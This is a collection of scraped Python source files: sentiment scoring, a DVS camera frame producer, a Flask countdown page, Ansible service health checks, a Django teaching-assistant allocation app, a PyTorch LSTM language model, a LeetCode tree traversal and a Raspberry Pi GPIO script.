them\r\ndf1[\"sentiment\"]=\"\"\r\ndf1[\"Category\"]=\"\"\r\ndf1[\"NA\"]=\"\"\r\ndf1[\"Intermediate_Sentiment\"]=\"\"\r\ndf1[\"Difference\"]=\"\"\r\n\r\n\r\n# Initializing the cursor\r\ncursor=db.cursor()\r\n\r\n# Filling in 0s in place of blank values\r\ndf1.fillna('0', axis=1, inplace=True)\r\n\r\n# Remove special characters to normalize the data\r\nremoveSpecialCharacters = ['\\.', '\\;', '\\:', '\\!', '\\?', '\\-', '\\#[A-Za-z0-9]+', \"\\'\", '\\(', '\\)']\r\nfor item in removeSpecialCharacters:\r\n df1['Message_Original'].replace(item, '', regex=True, inplace=True)\r\n\r\n# Lists for positive and negative words\r\nfilePath = \"positive-words.txt\"\r\npositivewords = []\r\nwordCount = 0\r\n\r\n# Read lines into a list\r\nfile = open(filePath, 'rU')\r\nfor line in file:\r\n for word in line.split():\r\n positivewords.append(word)\r\n wordCount += 1\r\n\r\nfilePath2 = \"negative-words.txt\"\r\nnegativewords = []\r\nwordCount = 0\r\n\r\nfile = open(filePath2, 'rU')\r\nfor line in file:\r\n for word in line.split():\r\n negativewords.append(word)\r\n wordCount += 1\r\nposcount = 0\r\nnegcount = 0\r\ndifcount = 0\r\n\r\n\r\nfor row,i in enumerate(df1[\"Message_Original\"]):\r\n posres = [f for f in positivewords if(f in i)]\r\n poscount=len(posres)\r\n negres = [f for f in negativewords if(f in i)]\r\n negcount=len(negres)\r\n difcount = poscount - negcount\r\n df1.loc[row,'Difference'] = difcount\r\n\r\n# Applying sentiment analysis function\r\nA = df1['Message_Original'] = df1['Message_Original'].apply(str)\r\ndf1['sentiment'] = A.apply(stm.sentimentP)\r\n\r\n# Checking for Blank Messages\r\nblank = blk.blankcheck(df1)\r\n'''\r\n#df1['subjectivity'] = A.apply(stm.sentimentS) \r\n#subjectivity = df1['subjectivity'] To be used in the future\r\n#Polarity = df1['sentiment']\r\n\r\n'''\r\n# Modifying the sentiment values to deal with the relative sentiment analysis problem\r\nfor z in list:\r\n if df1.loc[z, 'IsOP'] == 'Y':\r\n s = df1.loc[z, 'sentiment']\r\n for i in list:\r\n if df1.loc[i, 'IsOP'] == 'N':\r\n if s < 0 and df1.loc[i , 'sentiment'] > 0:\r\n df1.loc[i, 'sentiment'] = -0.5\r\n elif s < 0 and df1.loc[i, 'sentiment'] < 0:\r\n df1.loc[i, 'sentiment'] = 0.5\r\n else:\r\n pass\r\n\r\n# Dealing with image data\r\nfor index,i in enumerate(df1[\"Is_Image\"]):\r\n if i==\"Y\" and df1.loc[index,\"IsOP\"]==\"N\":\r\n df1.loc[index,\"sentiment\"]=-0.551\r\n df1.loc[index,\"Category\"]=\"Negative\"\r\n else:\r\n pass\r\n\r\n# Tinkering with the sentiment of the data to improve upon it\r\nlk.likedislike(df1)\r\nfor i in range(len(df1)):\r\n if i < len(df1.index) - 1: # the index starts from 0 so that is the reason for the -1\r\n df1.loc[i,'Intermediate_Sentiment'] = df1.loc[i,'sentiment']\r\n\r\n# Adding the difference between positive and negative words to the sentiment\r\nfor index,i in enumerate(df1['sentiment']):\r\n df1.loc[index,'sentiment'] += (df1.loc[index,'Difference'])/10\r\n\r\n# Visualising the data\r\npos, neg, neu = clck.ClassCheck(df1)\r\ndvl.dataVisualization(pos, neg, neu)\r\n\r\nprint(f'Number of blank spaces : {blank}')\r\n\r\n# Making a temp dataframe to use it's len function\r\ntempVariable=pd.DataFrame(df1)\r\n\r\n# Making all the data into str type\r\ndf1['Intermediate_Sentiment']=df1['Intermediate_Sentiment'].apply(str)\r\ndf1['Difference']=df1['Difference'].apply(str)\r\n\r\n# Selecting the values to be inserted into the table\r\nfor index in range(len(df1)):\r\n if index < len(df1.index)-1: # The minus 1 is there due to the records starting at 0\r\n msgID=df1.loc[index,\"Message_Id\"]\r\n NA = df1.loc[index, \"NA\"]\r\n sentiment = df1.loc[index, \"sentiment\"]\r\n category = df1.loc[index, \"Category\"]\r\n intSent = df1.loc[index,\"Intermediate_Sentiment\"]\r\n diff = df1.loc[index,\"Difference\"]\r\n values.append((sentiment,category,NA,diff,intSent,msgID))\r\n # Print statement for debugging purposes\r\n print ('insert into db')\r\n\r\n# Executing query2\r\ncursor.executemany(query2, values)\r\n\r\nhmp.heatmap(df1)\r\n\r\n#Visualizing data for every value\r\n\r\ndf1 = psql.read_sql(query3, con=db)\r\npost = int(0)\r\nnegt = int(0)\r\nneut = int(0)\r\nfor index in range(len(df1)):\r\n if index < len(df1.index) - 1:\r\n i = float(df1.loc[index,'sentiment'])\r\n print(i)\r\n df1.loc[index,'sentiment'] = i\r\n\r\npost, negt, neut = clck.ClassCheck(df1)\r\ndvl.dataVisualization(post, negt, neut)\r\n\r\n\r\n# Closing the cursor object, committing the changes to the database and closing the database\r\ncursor.close()\r\ndb.commit()\r\ndb.close()\r\n\r\n\r\n\r\n","sub_path":"sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"257156015","text":"\"\"\"\nproducer of DVS frames for classification of joker/nonjoker by consumer processs\nAuthors: Tobi Delbruck, Yuhuang Hu, Shasha Guo, Min Liu Oct 2020\n\"\"\"\n\nimport atexit\nimport pickle\nfrom pathlib import Path\n\nimport cv2\nimport sys\nimport math\nimport time\nimport numpy.ma as ma\nimport socket\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom globals_and_utils import *\nfrom engineering_notation import EngNumber as eng # only from pip\nimport argparse\nimport psutil\n\nfrom pyaer.davis import DAVIS\nfrom pyaer import libcaer\n\nlog=my_logger(__name__)\n\n\n\ndef producer(args):\n \"\"\" produce frames for consumer\n\n :param record: record frames to a folder name record\n \"\"\"\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n udp_address = ('', PORT)\n\n device = DAVIS(noise_filter=True)\n recording_folder = None\n recording_frame_number = 0\n\n def cleanup():\n log.info('closing {}'.format(device))\n device.shutdown()\n cv2.destroyAllWindows()\n if recording_folder is not None:\n log.info(f'*** recordings of {recording_frame_number - 1} frames saved in {recording_folder}')\n\n atexit.register(cleanup)\n record=args.record\n spacebar_records=args.spacebar_records\n space_toggles_recording=args.space_toggles_recording\n if space_toggles_recording and spacebar_records:\n log.error('set either spacebar_records or space_toggles_recording')\n quit(1)\n log.info(f'recording to {record} with spacebar_records={spacebar_records} space_toggles_recording={space_toggles_recording} and args {str(args)}')\n if record is not None:\n recording_folder = os.path.join(DATA_FOLDER, 'recordings', record)\n log.info(f'recording frames to {recording_folder}')\n Path(recording_folder).mkdir(parents=True, exist_ok=True)\n\n print(\"DVS USB ID:\", device.device_id)\n if device.device_is_master:\n print(\"DVS is master.\")\n else:\n print(\"DVS is slave.\")\n print(\"DVS Serial Number:\", device.device_serial_number)\n print(\"DVS String:\", device.device_string)\n print(\"DVS USB bus Number:\", device.device_usb_bus_number)\n print(\"DVS USB device address:\", device.device_usb_device_address)\n print(\"DVS size X:\", device.dvs_size_X)\n print(\"DVS size Y:\", device.dvs_size_Y)\n print(\"Logic Version:\", device.logic_version)\n print(\"Background Activity Filter:\",\n device.dvs_has_background_activity_filter)\n print(\"Color Filter\", device.aps_color_filter, type(device.aps_color_filter))\n print(device.aps_color_filter == 1)\n\n # device.start_data_stream()\n assert (device.send_default_config())\n # attempt to set up USB host buffers for acquisition thread to minimize latency\n assert (device.set_config(\n libcaer.CAER_HOST_CONFIG_USB,\n libcaer.CAER_HOST_CONFIG_USB_BUFFER_NUMBER,\n 8))\n assert (device.set_config(\n libcaer.CAER_HOST_CONFIG_USB,\n libcaer.CAER_HOST_CONFIG_USB_BUFFER_SIZE,\n 4096))\n assert (device.data_start())\n assert (device.set_config(\n libcaer.CAER_HOST_CONFIG_PACKETS,\n libcaer.CAER_HOST_CONFIG_PACKETS_MAX_CONTAINER_INTERVAL,\n 4000)) # set max interval to this value in us. Set to not produce too many packets/sec here, not sure about reasoning\n assert (device.set_data_exchange_blocking())\n\n # setting bias after data stream started\n device.set_bias_from_json(\"./configs/davis346_config.json\")\n xfac = float(IMSIZE) / device.dvs_size_X\n yfac = float(IMSIZE) / device.dvs_size_Y\n histrange = [(0, v) for v in (IMSIZE, IMSIZE)] # allocate DVS frame histogram to desired output size\n npix = IMSIZE * IMSIZE\n cv2_resized = False\n last_cv2_frame_time = time.time()\n frame=None\n frame_number=0\n time_last_frame_sent=time.time()\n frames_dropped_counter=0\n recording_activated=False\n save_next_frame=(not space_toggles_recording and not spacebar_records) # if we don't supply the option, it will be False and we want to then save all frames\n saved_events=[]\n\n vflow_ppus=0 # estimate vertical flow, pixels per microsecond, positive. Does not really help since mainly informative frames are when card is exposed\n try:\n timestr = time.strftime(\"%Y%m%d-%H%M\")\n numpy_frame_rate_data_file_path = f'{DATA_FOLDER}/producer-frame-rate-{timestr}.npy'\n while True:\n\n with Timer('overall producer frame rate', numpy_file=numpy_frame_rate_data_file_path , show_hist=True) as timer_overall:\n with Timer('accumulate DVS'):\n events = None\n while events is None or len(events)0:\n if events is None:\n events=pol_events\n else:\n events = np.vstack([events, pol_events]) # otherwise tack new events to end\n # log.debug('got {} events (total so far {}/{} events)'\n # .format(num_pol_event, 0 if events is None else len(events), EVENT_COUNT))\n dtMs = (time.time() - time_last_frame_sent)*1e3\n if recording_folder is None and dtMs args.clip_count]=args.clip_count\n frame= (255. / args.clip_count) * frame # max pixel will have value 255\n\n # statistics\n # focc=np.count_nonzero(frame)\n frame=frame.astype('uint8')\n # log.debug('from {} events, frame has occupancy {}% max_count {:.1f} events'.format(len(events), eng((100.*focc)/npix), fmax_count))\n\n with Timer('send frame'):\n time_last_frame_sent=time.time()\n data = pickle.dumps((frame_number, time_last_frame_sent, frame)) # send frame_number to allow determining dropped frames in consumer\n frame_number+=1\n client_socket.sendto(data, udp_address)\n if recording_folder is not None and (save_next_frame or recording_activated):\n recording_frame_number=write_next_image(recording_folder,recording_frame_number,frame)\n print('.',end='')\n if recording_frame_number%80==0:\n print('')\n if SHOW_DVS_OUTPUT:\n t=time.time()\n if t-last_cv2_frame_time>1./MAX_SHOWN_DVS_FRAME_RATE_HZ:\n last_cv2_frame_time=t\n with Timer('show DVS image'):\n # min = np.min(frame)\n # img = ((frame - min) / (np.max(frame) - min))\n cv2.namedWindow('DVS', cv2.WINDOW_NORMAL)\n cv2.imshow('DVS', 1-(1/256.)*frame)\n if not cv2_resized:\n cv2.resizeWindow('DVS', 600, 600)\n cv2_resized = True\n k= cv2.waitKey(1) & 0xFF\n if k== ord('q') or k== ord('x'):\n if recording_folder is not None:\n log.info(f'*** recordings of {recording_frame_number - 1} frames saved in {recording_folder}')\n print_timing_info()\n break\n elif k==ord('p'):\n print_timing_info()\n elif k==ord(' ') and (spacebar_records or space_toggles_recording):\n if spacebar_records:\n save_next_frame=True\n else:\n recording_activated=not recording_activated\n if recording_activated:\n print('recording activated - use space to stop recording')\n else:\n print('recording paused - use space to start recording')\n save_next_frame=recording_activated\n else:\n save_next_frame=(recording_activated or (not spacebar_records and not space_toggles_recording))\n if saved_events is not None and recording_folder is not None and len(saved_events)>0:\n nevents=0\n for a in saved_events:\n nevents+=len(a)\n o=np.empty((nevents,5),dtype=np.float32)\n idx=0\n for a in tqdm(saved_events,desc='converting events to numpy'):\n o[idx:idx+a.shape[0]]=a\n idx+=a.shape[0]\n data_path=os.path.join(recording_folder,f'events-{timestr}.npy')\n log.info(f'saving {eng(nevents)} events to {data_path}')\n np.save(data_path,o)\n except KeyboardInterrupt as e:\n log.info(f'got KeyboardInterrupt {e}')\n cleanup()\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='producer: Generates DVS frames for trixy to process in consumer', allow_abbrev=True,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n \"--record\", type=str, default=None,\n help=\"record DVS frames into folder DATA_FOLDER/collected/\")\n parser.add_argument(\n \"--num_events\", type=int, default=EVENT_COUNT_PER_FRAME,\n help=\"number of events per constant-count DVS frame\")\n parser.add_argument(\n \"--clip_count\", type=int, default=EVENT_COUNT_CLIP_VALUE,\n help=\"number of events per pixel for full white pixel value\")\n parser.add_argument(\n \"--spacebar_records\", action='store_true',\n help=\"only record when spacebar pressed down\")\n parser.add_argument(\n \"--space_toggles_recording\", action='store_true',\n help=\"space toggles recording on/off\")\n parser.add_argument(\n \"--numpy\", action='store_true',\n help=\"saves raw AE data to RAM and writes as numpy at the end (will gobble RAM like crazy)\")\n args = parser.parse_args()\n\n producer(args)\n","sub_path":"producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641176410","text":"# From Bing chat 04/28/23: Display real time countdown clock to date/time specified in config.txt\n# output to a web page\n\nfrom flask import Flask, render_template\nimport datetime\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n with open('config.txt') as f:\n date_str = f.readline().strip()\n date = datetime.datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S')\n now = datetime.datetime.now()\n diff = date - now\n return render_template('index.html', diff=diff)\n print(\"Time remaining:\", diff)\nif __name__ == '__main__':\n app.run(debug=True)\n#index()","sub_path":"countdown/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"640388243","text":"import abc\nimport hvac\nimport logging\nimport os\nimport pwd\nimport requests\nimport socket\nimport subprocess\nimport urllib\n\nfrom retry import retry\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n\nclass BaseCheck(object):\n __metaclass__ = abc.ABCMeta\n\n log_level = os.getenv('CHECKS_LOG_LEVEL', 'INFO')\n logging.basicConfig(level=logging.getLevelName(log_level), format='%(levelname)s | %(message)s')\n\n @abc.abstractmethod\n def check(self, **kwargs):\n pass\n\n\n def run(self, **kwargs):\n self.check(**kwargs)\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def systemd_unit_is_running(self, name):\n command = 'systemctl is-active {}'.format(name)\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n process.wait()\n result = process.stdout.read().rstrip()\n\n if result != 'active':\n logging.error('Service {} is not active'.format(name))\n raise Exception()\n logging.info(' * Service {} is active'.format(name))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def systemd_unit_is_enabled(self, name):\n command = 'systemctl list-unit-files | grep {} | grep enabled'.format(name)\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n process.wait()\n result = process.stdout.read().rstrip()\n\n if result == '':\n logging.error('Service {} is not enabled'.format(name))\n raise Exception()\n logging.info(' * Service {} is enabled'.format(name))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def ports_is_being_listened(self, ports, protocol = 'tcp'):\n not_opened = list()\n passed = True\n socket_type = socket.SOCK_STREAM if protocol == 'udp' else socket.SOCK_DGRAM\n\n for port in ports:\n sock = socket.socket(socket.AF_INET, socket_type)\n result = sock.connect_ex(('127.0.0.1', port))\n if result != 0:\n not_opened.append(port)\n passed = False\n\n if not passed:\n logging.error('{} ports check failed: {}'.format(protocol, not_opened))\n raise Exception()\n logging.info(' * {} ports have listeners: {}'.format(protocol, ports))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def http_check(self, url, expected_code):\n response_code = urllib.urlopen(url).getcode()\n if response_code == expected_code:\n logging.error('{} returned: {}, but expected {}'.format(url, response_code, expected_code))\n raise Exception()\n logging.info(' * Url {} returned {}'.format(url, expected_code))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def file_or_directory_exists(self, path):\n if not os.path.exists(path):\n logging.error('{} does not exist'.format(path))\n raise Exception()\n logging.info((' * {} string exists'.format(path)))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def file_contains(self, file, search_string):\n if not search_string in open(file).read():\n logging.error('{} string does not exist in {}'.format(search_string, file))\n raise Exception()\n logging.info((' * {} string exists in {}'.format(search_string, file)))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def user_exists(self, uid):\n try:\n pwd.getpwuid(uid)\n except KeyError:\n logging.error('User ID {} does not exist'.format(uid))\n raise Exception()\n logging.info(' * User ID {} exists'.format(uid))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def hostname_resolves(self, hostname):\n try:\n socket.gethostbyname(hostname)\n except Exception:\n logging.error('Hostname {} does not resolve'.format(hostname))\n raise Exception()\n logging.info(' * {} hostname resolves successfully.'.format(hostname))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def vault_initialised(self, vault_addr):\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n vault = hvac.Client(url=vault_addr, verify=False)\n\n if not vault.sys.is_initialized():\n logging.error('Vault [{}] is not initialized.'.format(vault_addr))\n raise Exception()\n logging.info(' * Vault [{}] is initialized'.format(vault_addr))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def self_in_peers_list(self, peers_list_url, listening_port):\n ip = requests.get('http://169.254.169.254/latest/meta-data/local-ipv4').text\n peer = '{}:{}'.format(ip, listening_port)\n peer_list = requests.get(peers_list_url).json()\n if peer not in peer_list:\n logging.error('Peer () not in list ({}).'.format(peer, peer_list))\n raise Exception()\n logging.info(' * Peer in list.')\n","sub_path":"ansible/roles/cfn-tools/templates/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166904634","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.utils.timezone import now, make_aware, get_default_timezone\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_http_methods\nfrom django.db.models import F, Count\nfrom page.models import Assistant, Course, Question\nfrom page.forms import AssistantForm, QuestionForm\nfrom page import __init__\nimport datetime\n\n# Create your views here.\nANNOUNCEMENT_TIME = make_aware(datetime.datetime(year=2016,month=2,day=29,hour=23,minute=45), get_default_timezone())\nRESULT_PROCESS = False\n\ndef show_main(request):\n\treturn render(request, 'show_main.html')\n\n@login_required\ndef edit_my_info(request):\n\ttry:\n\t\tmy_info = Assistant.objects.get(user=request.user)\n\texcept Assistant.DoesNotExist:\n\t\tform = AssistantForm()\n\t\tform.user = request.user\n\telse:\n\t\tform = AssistantForm(instance=my_info)\n\treturn render(request, 'edit_my_info.html', {'form':form})\n\n\n@login_required\n@require_http_methods([\"POST\"])\ndef save_my_info(request):\n\tglobal ANNOUNCEMENT_TIME\n\tif now() > ANNOUNCEMENT_TIME:\n\t\treturn redirect(reverse('edit_my_info'))\n\tform = AssistantForm(request.POST)\n\tif form.is_valid():\n\t\tassistant = form.save(commit=False)\n\t\tif assistant.third_course != None and assistant.second_course == None:\n\t\t\treturn redirect(reverse('edit_my_info'))\n\t\telse:\n\t\t\tif assistant.semester > 0:\n\t\t\t\treturn redirect(reverse('edit_my_info'))\n\t\t\tif assistant.second_course != None and assistant.third_course == None:\n\t\t\t\tif assistant.first_course == assistant.second_course:\n\t\t\t\t\treturn redirect(reverse('edit_my_info'))\n\t\t\telif assistant.second_course != None and assistant.third_course != None:\n\t\t\t\tif (assistant.first_course == assistant.second_course) or (assistant.first_course == assistant.third_course) or (assistant.second_course == assistant.third_course):\n\t\t\t\t\treturn redirect(reverse('edit_my_info'))\n\t\t\tassistant.user = request.user\n\t\t\tassistant.save()\n\t\t\treturn redirect(reverse('show_main'))\n\telse:\n\t\treturn redirect(reverse('edit_my_info'))\n\n\n@login_required\ndef show_result(request):\n\tglobal ANNOUNCEMENT_TIME, RESULT_PROCESS\n\tif now() > ANNOUNCEMENT_TIME:\n\t\tif not RESULT_PROCESS:\n\t\t\tcourse_list = Course.objects.annotate(final_assistant_count=Count('final_assistant',distinct=True))\\\n\t\t\t\t\t\t .filter(final_assistant_count__lt=F('assistant_number'))\n\t\t\tfor course in course_list:\n\t\t\t\tif course.assistant_number-course.final_assistant_count >= course.first_assistant.filter(result=None).count():\n\t\t\t\t\tfor assistant in course.first_assistant.filter(result=None):\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\t\telse:\n\t\t\t\t\tfor assistant in course.first_assistant.filter(result=None).order_by('?')[:course.assistant_number]:\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\tcourse_list = Course.objects.annotate(final_assistant_count=Count('final_assistant',distinct=True))\\\n\t\t\t\t\t\t .filter(final_assistant_count__lt=F('assistant_number'))\n\t\t\tfor course in course_list:\n\t\t\t\tif course.assistant_number-course.final_assistant_count >= course.second_assistant.filter(result=None).count():\n\t\t\t\t\tfor assistant in course.second_assistant.filter(result=None):\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\t\telse:\n\t\t\t\t\tfor assistant in course.second_assistant.filter(result=None).order_by('?')[:course.assistant_number]:\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\tcourse_list = Course.objects.annotate(final_assistant_count=Count('final_assistant',distinct=True))\\\n\t\t\t\t\t\t .filter(final_assistant_count__lt=F('assistant_number'))\n\t\t\tfor course in course_list:\n\t\t\t\tif course.assistant_number-course.final_assistant_count >= course.third_assistant.filter(result=None).count():\n\t\t\t\t\tfor assistant in course.third_assistant.filter(result=None):\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\t\telse:\n\t\t\t\t\tfor assistant in course.third_assistant.filter(result=None).order_by('?')[:course.assistant_number]:\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\tRESULT_PROCESS = True\n\t\tcourse_list = Course.objects.annotate(Count('first_assistant',distinct=True),\\\n\t\t\t\tCount('second_assistant',distinct=True),Count('third_assistant',distinct=True))\n\t\treturn render(request, 'show_result.html', {'course_list':course_list})\n\telse:\n\t\tcourse_list = Course.objects.annotate(Count('first_assistant',distinct=True),\\\n\t\t\t\tCount('second_assistant',distinct=True),Count('third_assistant',distinct=True))\n\t\treturn render(request, 'show_result_before.html', {'time':ANNOUNCEMENT_TIME, 'course_list':course_list})\n\n@login_required\ndef write_question(request):\n\tif request.method == 'POST':\n\t\tform = QuestionForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tquestion = form.save(commit=False)\n\t\t\tquestion.user = request.user\n\t\t\tquestion.save()\n\t\t\treturn redirect(reverse('show_main'))\n\telse:\n\t\tform = QuestionForm()\n\treturn render(request, 'write_question.html', {'form':form})\n\n@login_required\ndef show_question(request):\n\tquestion_list = Question.objects.all().order_by('-date')\n\treturn render(request, 'show_question.html', {'question_list':question_list})\n","sub_path":"assistant_distribution/page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140514666","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2018/11/16 10:34\n@Author : LI Zhe\n\"\"\"\nimport torch\nfrom torch import nn, optim\nfrom torch.autograd import Variable\nfrom data_utils import Corpus\n\nclass language_model(nn.Module):\n def __init__(self, vocab_size, embedding_dim, hidden_size, num_layers):\n super(language_model, self).__init__()\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers, batch_first=True)\n self.linear = nn.Linear(hidden_size, vocab_size)\n\n def forward(self, x, h):\n x = self.embedding(x)\n x, hi = self.lstm(x, h)\n b, s, h = x.size()\n x = x.contiguous().view(b * s, h)\n x = self.linear(x)\n return x, hi\n\nseq_length = 30\n\ntrain_file = 'train.txt'\nval_file = 'val.txt'\ntest_file = 'test.txt'\ntrain_corpus = Corpus()\nval_corpus = Corpus()\ntest_corpus = Corpus()\n\ntrain_id = train_corpus.get_data(train_file)\nval_id = train_corpus.get_data(val_file)\ntest_id = train_corpus.get_data(test_file)\n\nvocab_size = len(train_corpus.dic)\nnum_batches = train_id.size(1) // seq_length\n\nmodel = language_model(vocab_size, 128, 1024, 1)\n\n# if torch.cuda.device_count() > 1:\n# model = nn.DataParallel(model)\nif torch.cuda.is_available():\n model = model.cuda()\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=1e-3)\n\ndef detach(states):\n if torch.cuda.is_available():\n return [Variable(state.data).cuda() for state in states]\n else:\n return [Variable(state.data) for state in states]\n\nfor epoch in range(5):\n print('*' * 10)\n print('epoch {}'.format(epoch))\n running_loss = 0\n if torch.cuda.is_available():\n states = (Variable(torch.zeros(1, 20, 1024)).cuda(),\n Variable(torch.zeros(1, 20, 1024)).cuda())\n else:\n states = (Variable(torch.zeros(1, 20, 1024)),\n Variable(torch.zeros(1, 20, 1024)))\n for i in range(0, train_id.size(1) - 2 * seq_length, seq_length):\n input_x = train_id[:, i : (i + seq_length)]\n label = train_id[:, (i + seq_length):(i + 2 * seq_length)]\n if torch.cuda.is_available():\n input_x = Variable(input_x).cuda()\n label = Variable(label).cuda()\n else:\n input_x = Variable(input_x)\n label = Variable(label)\n # print(label.size(0), label.size(1))\n label = label.contiguous().view(label.size(0) * label.size(1), -1)\n states = detach(states)\n # forward\n out, states = model(input_x, states)\n loss = criterion(out, label.view(-1))\n running_loss += loss.data\n # backward\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm(model.parameters(), 0.5)\n optimizer.step()\n\n step = (i + 1) // seq_length\n if step % 100 == 0:\n print('epoch [{} / {}], step[{} / {}], loss: {}'.format(epoch+1, 5, step, num_batches, loss.data))\n print('Epoch {} Finished, loss:{}'.format(epoch+1, running_loss/(train_id.size(1) // seq_length - 1)))\n\n# Test model\nmodel.eval()\n# eval mode (batchnorm uses moving mean/variance instead of mini-batch mean/variance)\neval_loss = 0.0\neval_acc = 0.0\n\nwith torch.no_grad():\n if torch.cuda.is_available():\n states = (Variable(torch.zeros(1, 20, 1024)).cuda(),\n Variable(torch.zeros(1, 20, 1024)).cuda())\n else:\n states = (Variable(torch.zeros(1, 20, 1024)),\n Variable(torch.zeros(1, 20, 1024)))\n\n for i in range(0, test_id.size(1) - 2 * seq_length, seq_length):\n input_x = test_id[:, i: (i + seq_length)]\n label = test_id[:, (i + seq_length):(i + 2 * seq_length)]\n if torch.cuda.is_available():\n input_x = Variable(input_x).cuda()\n label = Variable(label).cuda()\n else:\n input_x = Variable(input_x)\n label = Variable(label)\n label = label.contiguous().view(label.size(0) * label.size(1), -1)\n states = detach(states)\n\n # forward\n out, states = model(input_x, states)\n test_loss = criterion(out, label.view(-1))\n\n step = (i + 1) // seq_length\n if step % 100 == 0:\n print('step[{}], loss: {}'.format(step, test_loss.data))\n print('Test Loss: {:.6f}'.format(eval_loss / (test_id.size(1) // seq_length - 1)))\n","sub_path":"PyTorch/07-Language-model/language_model.py","file_name":"language_model.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574605889","text":"# Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).\n\n# For example:\n# Given binary tree [3,9,20,null,null,15,7],\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# return its bottom-up level order traversal as:\n# [\n# [15,7],\n# [9,20],\n# [3]\n# ]\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n q = collections.deque\n q.append((root, 0))\n l = []\n\n while len(q) > 0:\n \tcurr, height = q.popleft()\n \tl.append((curr.val, height))\n \tif curr.left: q.append((curr.left, height+1))\n \tif curr.right: q.append((curr.right, height+1))\n\n currHeight = 0\n retval = []\n currLevel = []\n for p in l:\n \tif p[1] == currHeight:\n \t\tcurrLevel.append(p[0])\n \telse:\n \t\tretval.append(currLevel)\n \t\tcurrHeight = p[1]\n \t\tcurrLevel = [p[0]]\n\n return reversed(retval)","sub_path":"LC/Easy/107.py","file_name":"107.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539168712","text":"import RPi.GPIO as GPIO\r\nfrom time import sleep\r\n\r\nGPIO.setmode(GPIO.BCM) \t# BCM = numeração GPIO\r\n\r\noutA = 18\r\nGPIO.setup(outA, GPIO.OUT, initial=0)\r\ntempo = 1\r\ntry:\r\n print(\"CTRL+C para terminar\")\r\n while True:\r\n GPIO.output(outA, 1)\r\n print(\"GPIO\", outA, \": ON\")\r\n sleep(tempo)\r\n GPIO.output(outA, 0)\r\n print(\"GPIO %d : %s\" % (outA, \"OFF\")) #com formatação\r\n sleep(tempo)\r\n tempo+=1\r\nexcept KeyboardInterrupt:\r\n print(\"\\nPrograma terminado pelo utilizador.\")\t\t\r\nexcept:\r\n print(\"\\nErro!!!\")\r\nfinally:\r\n print(\"A fazer 'reset' ao GPIO...\", end=\"\")\r\n GPIO.cleanup()\r\n print(\"ok.\")\r\nprint(\"Fim do programa.\")\r\n","sub_path":"lab04ex06_out1.py","file_name":"lab04ex06_out1.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 